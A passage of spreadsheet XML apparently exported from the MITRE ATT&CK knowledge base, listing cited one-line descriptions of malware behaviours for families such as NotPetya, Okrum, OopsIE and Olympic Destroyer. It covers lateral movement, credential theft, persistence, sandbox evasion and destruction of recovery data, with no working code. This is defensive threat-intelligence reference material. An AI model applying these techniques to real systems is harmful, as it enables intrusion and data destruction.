  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) can use valid credentials with [PsExec](https://attack.mitre.org/software/S0029) or &lt;code&gt;wmic&lt;/code&gt; to spread itself to remote systems.(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) drops [PsExec](https://attack.mitre.org/software/S0029) with the filename dllhost.dat.(Citation: Talos Nyetya June 2017)</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) uses &lt;code&gt;rundll32.exe&lt;/code&gt; to install itself on remote systems when accessed via [PsExec](https://attack.mitre.org/software/S0029) or &lt;code&gt;wmic&lt;/code&gt;.(Citation: Talos Nyetya June 2017)</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) can use [PsExec](https://attack.mitre.org/software/S0029), which interacts with the &lt;code&gt;ADMIN$&lt;/code&gt; network share to execute commands on remote systems.(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)(Citation: PsExec Russinovich)</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) creates a task to reboot the system one hour after infection.(Citation: Talos Nyetya June 2017)</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) determines if specific antivirus programs are running on an infected host machine.(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) can use [PsExec](https://attack.mitre.org/software/S0029) to help propagate itself across a network.(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) will reboot the system one hour after infection.(Citation: Talos Nyetya June 2017)(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) can use &lt;code&gt;wmic&lt;/code&gt; to help propagate itself across a network.(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)</t>
  </si>
  <si>
    <t>[OLDBAIT](https://attack.mitre.org/software/S0138) collects credentials from several email clients.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>[OLDBAIT](https://attack.mitre.org/software/S0138) collects credentials from Internet Explorer, Mozilla Firefox, and Eudora.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>[OLDBAIT](https://attack.mitre.org/software/S0138) can use SMTP for C2.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>[OLDBAIT](https://attack.mitre.org/software/S0138) installs itself in &lt;code&gt;%ALLUSERPROFILE%\\Application Data\Microsoft\MediaPlayer\updatewindws.exe&lt;/code&gt;; the directory name is missing a space and the file name is missing the letter "o."(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>[OLDBAIT](https://attack.mitre.org/software/S0138) obfuscates internal strings and unpacks them at startup.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>[OLDBAIT](https://attack.mitre.org/software/S0138) can use HTTP for C2.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>[OSInfo](https://attack.mitre.org/software/S0165) enumerates local and domain users(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t xml:space="preserve">[OSInfo](https://attack.mitre.org/software/S0165) specifically looks for Domain Admins and power users within the domain.(Citation: Symantec Buckeye) </t>
  </si>
  <si>
    <t>[OSInfo](https://attack.mitre.org/software/S0165) has enumerated the local administrators group.(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>[OSInfo](https://attack.mitre.org/software/S0165) discovers shares on the network(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>[OSInfo](https://attack.mitre.org/software/S0165) queries the registry to look for information about Terminal Services.(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>[OSInfo](https://attack.mitre.org/software/S0165) performs a connection test to discover remote systems in the network(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>[OSInfo](https://attack.mitre.org/software/S0165) discovers information about the infected machine.(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>[OSInfo](https://attack.mitre.org/software/S0165) discovers the current domain information.(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>[OSInfo](https://attack.mitre.org/software/S0165) enumerates the current network connections similar to &lt;code&gt; net use &lt;/code&gt;.(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>[OSX/Shlayer](https://attack.mitre.org/software/S0402) can install malicious Safari browser extensions to serve ads.(Citation: Intego Shlayer Apr 2018)(Citation: Malwarebytes Crossrider Apr 2018)</t>
  </si>
  <si>
    <t>[OSX/Shlayer](https://attack.mitre.org/software/S0402) can base64-decode and AES-decrypt downloaded payloads.(Citation: Carbon Black Shlayer Feb 2019)</t>
  </si>
  <si>
    <t>Elevated Execution with Prompt</t>
  </si>
  <si>
    <t>[OSX/Shlayer](https://attack.mitre.org/software/S0402) can escalate privileges to root by asking the user for credentials.(Citation: Carbon Black Shlayer Feb 2019)</t>
  </si>
  <si>
    <t>[OSX/Shlayer](https://attack.mitre.org/software/S0402) executes a .command script from a hidden directory in a mounted DMG.(Citation: Carbon Black Shlayer Feb 2019)</t>
  </si>
  <si>
    <t>[OSX/Shlayer](https://attack.mitre.org/software/S0402) can use the &lt;code&gt;chmod&lt;/code&gt; utility to set a .app file as executable, and the &lt;code&gt;spctl&lt;/code&gt; application to disable Gatekeeper protection for a downloaded file.(Citation: Carbon Black Shlayer Feb 2019).(Citation: Carbon Black Shlayer Feb 2019)</t>
  </si>
  <si>
    <t>[OSX/Shlayer](https://attack.mitre.org/software/S0402) relies on users mounting and executing a malicious DMG file.(Citation: Carbon Black Shlayer Feb 2019)(Citation: Intego Shlayer Feb 2018)</t>
  </si>
  <si>
    <t>[OSX/Shlayer](https://attack.mitre.org/software/S0402) can masquerade as a Flash Player update.(Citation: Carbon Black Shlayer Feb 2019)(Citation: Intego Shlayer Feb 2018)</t>
  </si>
  <si>
    <t>[OSX/Shlayer](https://attack.mitre.org/software/S0402) can collect the macOS version and IOPlatformUUID.(Citation: Carbon Black Shlayer Feb 2019)</t>
  </si>
  <si>
    <t>[OSX/Shlayer](https://attack.mitre.org/software/S0402) can use bash scripts to check the macOS version and download payloads.(Citation: Carbon Black Shlayer Feb 2019)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) scrambles and encrypts data using AES256 before sending it to the C2 server.(Citation: TrendMicro MacOS April 2018)(Citation: Trend Micro MacOS Backdoor November 2020)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) has the ability to upload files from a compromised host..(Citation: Trend Micro MacOS Backdoor November 2020)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) has a command to delete a file from the system.(Citation: TrendMicro MacOS April 2018)(Citation: Trend Micro MacOS Backdoor November 2020)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) can delete the file quarantine attribute.(Citation: Trend Micro MacOS Backdoor November 2020)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) sets the main loader file’s attributes to hidden.(Citation: TrendMicro MacOS April 2018)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) has a command to download and execute a file on the victim’s machine.(Citation: TrendMicro MacOS April 2018)(Citation: Trend Micro MacOS Backdoor November 2020)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) can create a persistence file in the folder &lt;code&gt;/Library/LaunchAgents&lt;/code&gt;.(Citation: TrendMicro MacOS April 2018)(Citation: Trend Micro MacOS Backdoor November 2020)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) can create a persistence file in the folder &lt;code&gt;/Library/LaunchDaemons&lt;/code&gt;.(Citation: TrendMicro MacOS April 2018)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) has disguised its app bundle by adding special characters to the filename and using the icon for legitimate Word documents.(Citation: Trend Micro MacOS Backdoor November 2020)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) encrypts its strings in RSA256 and encodes them in a custom base64 scheme and XOR.(Citation: TrendMicro MacOS April 2018)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) uses PowerShell scripts.(Citation: TrendMicro MacOS April 2018)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) has a variant that is packed with UPX.(Citation: ESET OceanLotus macOS April 2019)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) has a variant that checks a number of system parameters to see if it is being run on real hardware or in a virtual machine environment.(Citation: ESET OceanLotus macOS April 2019)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) collects processor information, memory information, computer name, hardware UUID, serial number, and operating system version.(Citation: TrendMicro MacOS April 2018)(Citation: Trend Micro MacOS Backdoor November 2020)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) can collect the network interface MAC address on the infected host.(Citation: TrendMicro MacOS April 2018)(Citation: Trend Micro MacOS Backdoor November 2020)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) can use the touch command to change timestamps.(Citation: Trend Micro MacOS Backdoor November 2020)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) can use shell script to execute malicious code.(Citation: Trend Micro MacOS Backdoor November 2020)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) uses Word macros for execution.(Citation: TrendMicro MacOS April 2018)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) can use HTTP POST and GET requests to send and receive C2 information.(Citation: Trend Micro MacOS Backdoor November 2020)</t>
  </si>
  <si>
    <t>[OceanSalt](https://attack.mitre.org/software/S0346) can delete files from the system.(Citation: McAfee Oceansalt Oct 2018)</t>
  </si>
  <si>
    <t>[OceanSalt](https://attack.mitre.org/software/S0346) can extract drive information from the endpoint and search files on the system.(Citation: McAfee Oceansalt Oct 2018)</t>
  </si>
  <si>
    <t>[OceanSalt](https://attack.mitre.org/software/S0346) can encode data with a NOT operation before sending the data to the control server.(Citation: McAfee Oceansalt Oct 2018)</t>
  </si>
  <si>
    <t>[OceanSalt](https://attack.mitre.org/software/S0346) can collect the name and ID for every process running on the system.(Citation: McAfee Oceansalt Oct 2018)</t>
  </si>
  <si>
    <t>[OceanSalt](https://attack.mitre.org/software/S0346) has been delivered via spearphishing emails with Microsoft Office attachments.(Citation: McAfee Oceansalt Oct 2018)</t>
  </si>
  <si>
    <t>[OceanSalt](https://attack.mitre.org/software/S0346) can collect the computer name from the system.(Citation: McAfee Oceansalt Oct 2018)</t>
  </si>
  <si>
    <t>[OceanSalt](https://attack.mitre.org/software/S0346) can collect the victim’s IP address.(Citation: McAfee Oceansalt Oct 2018)</t>
  </si>
  <si>
    <t>[OceanSalt](https://attack.mitre.org/software/S0346) can create a reverse shell on the infected endpoint using cmd.exe.(Citation: McAfee Oceansalt Oct 2018) [OceanSalt](https://attack.mitre.org/software/S0346) has been executed via malicious macros.(Citation: McAfee Oceansalt Oct 2018)</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) collects information on the Windows directory and searches for compressed RAR files on the host.(Citation: Securelist Octopus Oct 2018)</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) can upload and download files to and from the victim’s machine.(Citation: Securelist Octopus Oct 2018)</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) can capture screenshots of the victims’ machine.(Citation: Securelist Octopus Oct 2018)</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) encodes C2 communications in Base64.(Citation: Securelist Octopus Oct 2018)</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) collects system drive information, the computer name, and the size of the disk.(Citation: Securelist Octopus Oct 2018)</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) collects the host IP address from the victim’s machine.(Citation: Securelist Octopus Oct 2018)</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) collects the username from the victim’s machine.(Citation: Securelist Octopus Oct 2018)</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) uses HTTP for C2 communications.(Citation: Securelist Octopus Oct 2018)</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) uses wmic.exe for local discovery information.(Citation: Securelist Octopus Oct 2018)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) has used a custom implementation of AES encryption to encrypt collected data.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) was seen using a RAR archiver tool to compress/decompress data.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) was seen using modified Quarks PwDump to perform credential dumping.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439)'s loader can decrypt the backdoor code, embedded within the loader or within a legitimate PNG file. A custom XOR cipher or RC4 is used for decryption.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>Data exfiltration is done by [Okrum](https://attack.mitre.org/software/S0439) using the already opened channel with the C2 server.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) can identify proxy servers configured and used by the victim, and use it to make HTTP requests to C2 its server.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439)'s backdoor deletes files after they have been successfully uploaded to C2 servers.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) has used DriveLetterView to enumerate drive information.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>Before exfiltration, [Okrum](https://attack.mitre.org/software/S0439)'s backdoor has used hidden files to store logs and outputs from backdoor commands.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) has built-in commands for uploading, downloading, and executing files to the system.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) was seen using a keylogger tool to capture keystrokes. (Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) was seen using MimikatzLite to perform credential dumping.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) can establish persistence by adding a new service NtmsSvc with the display name Removable Storage to masquerade as a legitimate Removable Storage Manager.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) mimics HTTP protocol for C2 communication, while hiding the actual messages in the Cookie and Set-Cookie headers of the HTTP requests.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Okrum](https://attack.mitre.org/software/S0439) establishes persistence by creating a .lnk shortcut to itself in the Startup folder.(Citation: ESET Okrum July 2019) </t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439)'s installer can attempt to achieve persistence by creating a scheduled task.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439)'s loader can create a new service named NtmsSvc to execute the payload.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) can establish persistence by creating a .lnk shortcut to itself in the Startup folder.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) has used base64 to encode C2 communication.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439)'s payload is encrypted and embedded within its loader, or within a legitimate PNG file.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) uses AES to encrypt network traffic. The key can be hardcoded or negotiated with the C2 server in the registration phase. (Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439)'s loader can check the amount of physical memory and terminates itself if the host has less than 1.5 Gigabytes of physical memory in total.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) can collect computer name, locale information, and information about the OS and architecture.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) can collect network information, including the host IP address, DNS, and proxy information.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) was seen using NetSess to discover NetBIOS sessions.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) can collect the victim username.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) can obtain the date and time of the compromised system.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439)'s loader can detect presence of an emulator by using two calls to GetTickCount API, and checking whether the time has been accelerated.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) can impersonate a logged-on user's security context using a call to the ImpersonateLoggedOnUser API.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>User Activity Based Checks</t>
  </si>
  <si>
    <t xml:space="preserve">[Okrum](https://attack.mitre.org/software/S0439) loader only executes the payload after the left mouse button has been pressed at least three times, in order to avoid being executed within virtualized or emulated environments.(Citation: ESET Okrum July 2019) </t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) uses HTTP for communication with its C2.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439)'s backdoor has used cmd.exe to execute arbitrary commands as well as batch scripts to update itself to a newer version.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>To establish persistence, [Okrum](https://attack.mitre.org/software/S0439) can install itself as a new service named NtmSsvc.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Olympic Destroyer](https://attack.mitre.org/software/S0365) will attempt to clear the System and Security event logs using &lt;code&gt;wevtutil&lt;/code&gt;.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>[Olympic Destroyer](https://attack.mitre.org/software/S0365) contains a module that tries to obtain stored credentials from web browsers.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Olympic Destroyer](https://attack.mitre.org/software/S0365) overwrites files locally and on remote shares.(Citation: Talos Olympic Destroyer 2018)(Citation: US District Court Indictment GRU Unit 74455 October 2020) </t>
  </si>
  <si>
    <t>[Olympic Destroyer](https://attack.mitre.org/software/S0365) uses the native Windows utilities &lt;code&gt;vssadmin&lt;/code&gt;, &lt;code&gt;wbadmin&lt;/code&gt;, and &lt;code&gt;bcdedit&lt;/code&gt; to delete and disable operating system recovery features such as the Windows backup catalog and Windows Automatic Repair.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>[Olympic Destroyer](https://attack.mitre.org/software/S0365) contains a module that tries to obtain credentials from LSASS, similar to [Mimikatz](https://attack.mitre.org/software/S0002). These credentials are used with [PsExec](https://attack.mitre.org/software/S0029) and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to help the malware propagate itself across a network.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>[Olympic Destroyer](https://attack.mitre.org/software/S0365) attempts to copy itself to remote machines on the network.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>[Olympic Destroyer](https://attack.mitre.org/software/S0365) will attempt to enumerate mapped network shares to later attempt to wipe all files on those shares.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>[Olympic Destroyer](https://attack.mitre.org/software/S0365) uses [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to enumerate all systems in the network.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>[Olympic Destroyer](https://attack.mitre.org/software/S0365) uses [PsExec](https://attack.mitre.org/software/S0029) to interact with the &lt;code&gt;ADMIN$&lt;/code&gt; network share to execute commands on remote systems.(Citation: Talos Olympic Destroyer 2018)(Citation: PsExec Russinovich)</t>
  </si>
  <si>
    <t>[Olympic Destroyer](https://attack.mitre.org/software/S0365) utilizes [PsExec](https://attack.mitre.org/software/S0029) to help propagate itself across a network.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>[Olympic Destroyer](https://attack.mitre.org/software/S0365) uses the API call &lt;code&gt;ChangeServiceConfigW&lt;/code&gt; to disable all services on the affected system.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>[Olympic Destroyer](https://attack.mitre.org/software/S0365) uses API calls to enumerate the infected system's ARP table.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>[Olympic Destroyer](https://attack.mitre.org/software/S0365) will shut down the compromised system after it is done modifying system configuration settings.(Citation: Talos Olympic Destroyer 2018)(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>[Olympic Destroyer](https://attack.mitre.org/software/S0365) uses WMI to help propagate itself across a network.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>[OnionDuke](https://attack.mitre.org/software/S0052) can use a custom decryption algorithm to decrypt strings.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[OnionDuke](https://attack.mitre.org/software/S0052) has the capability to use a Denial of Service module.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[OnionDuke](https://attack.mitre.org/software/S0052) steals credentials from its victims.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[OnionDuke](https://attack.mitre.org/software/S0052) uses Twitter as a backup C2.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[OnionDuke](https://attack.mitre.org/software/S0052) uses HTTP and HTTPS for C2.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) compresses collected files with a simple character replacement scheme before sending them to its C2 server.(Citation: Unit 42 OopsIE! Feb 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) compresses collected files with GZipStream before sending them to its C2 server.(Citation: Unit 42 OopsIE! Feb 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) exfiltrates command output and collected files to its C2 server in 1500-byte blocks.(Citation: Unit 42 OopsIE! Feb 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) concatenates then decompresses multiple resources to load an embedded .Net Framework assembly.(Citation: Unit 42 OopsIE! Feb 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) can upload files from the victim's machine to its C2 server.(Citation: Unit 42 OopsIE! Feb 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) has the capability to delete files and scripts from the victim's machine.(Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) can download files from its C2 server to the victim's machine.(Citation: Unit 42 OopsIE! Feb 2018)(Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) stages the output from command execution and collected files in specific folders before exfiltration.(Citation: Unit 42 OopsIE! Feb 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) uses the Confuser protector to obfuscate an embedded .Net Framework assembly used for C2. [OopsIE](https://attack.mitre.org/software/S0264) also encodes collected data in hexadecimal format before writing to files on disk and obfuscates strings.(Citation: Unit 42 OopsIE! Feb 2018)(Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) creates a scheduled task to run itself every three minutes.(Citation: Unit 42 OopsIE! Feb 2018)(Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) uses the SmartAssembly obfuscator to pack an embedded .Net Framework assembly used for C2.(Citation: Unit 42 OopsIE! Feb 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) encodes data in hexadecimal format over the C2 channel.(Citation: Unit 42 OopsIE! Feb 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) performs several anti-VM and sandbox checks on the victim's machine. One technique the group has used was to perform a WMI query &lt;code&gt;SELECT * FROM MSAcpi_ThermalZoneTemperature&lt;/code&gt; to check the temperature to see if it’s running in a virtual environment.(Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) checks for information on the CPU fan, temperature, mouse, hard disk, and motherboard as part of its anti-VM checks.(Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) checks to see if the system is configured with "Daylight" time and checks for a specific region to be set for the timezone.(Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) creates and uses a VBScript as part of its persistent execution.(Citation: Unit 42 OopsIE! Feb 2018)(Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) uses HTTP for C2 communications.(Citation: Unit 42 OopsIE! Feb 2018)(Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) uses the command prompt to execute commands on the victim's machine.(Citation: Unit 42 OopsIE! Feb 2018)(Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) uses WMI to perform discovery techniques.(Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t>[Orz](https://attack.mitre.org/software/S0229) has used Technet and Pastebin web pages for command and control.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>[Orz](https://attack.mitre.org/software/S0229) can gather victim drive information.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>[Orz](https://attack.mitre.org/software/S0229) can overwrite Registry settings to reduce its visibility on the victim.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>[Orz](https://attack.mitre.org/software/S0229) can download files onto the victim.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>Some [Orz](https://attack.mitre.org/software/S0229) strings are base64 encoded, such as the embedded DLL known as MockDll.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>[Orz](https://attack.mitre.org/software/S0229) can gather a process list from the victim.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>Some [Orz](https://attack.mitre.org/software/S0229) versions have an embedded DLL known as MockDll that uses process hollowing and [Regsvr32](https://attack.mitre.org/techniques/T1218/010) to execute another payload.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>Some [Orz](https://attack.mitre.org/software/S0229) versions have an embedded DLL known as MockDll that uses [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) and regsvr32 to execute another payload.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>[Orz](https://attack.mitre.org/software/S0229) can gather the victim's Internet Explorer version.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>[Orz](https://attack.mitre.org/software/S0229) can gather the victim OS version and whether it is 64 or 32 bit.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>[Orz](https://attack.mitre.org/software/S0229) can gather victim proxy information.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>[Orz](https://attack.mitre.org/software/S0229) can execute shell commands.(Citation: Proofpoint Leviathan Oct 2017) [Orz](https://attack.mitre.org/software/S0229) can execute commands with JavaScript.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>[Out1](https://attack.mitre.org/software/S0594) can copy files and Registry data from compromised hosts.(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>[Out1](https://attack.mitre.org/software/S0594) can parse e-mails on a target machine.(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>[Out1](https://attack.mitre.org/software/S0594) has the ability to encode data.(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>[Out1](https://attack.mitre.org/software/S0594) can use HTTP and HTTPS in communications with remote hosts.(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>[Out1](https://attack.mitre.org/software/S0594) can use native command line for execution.(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
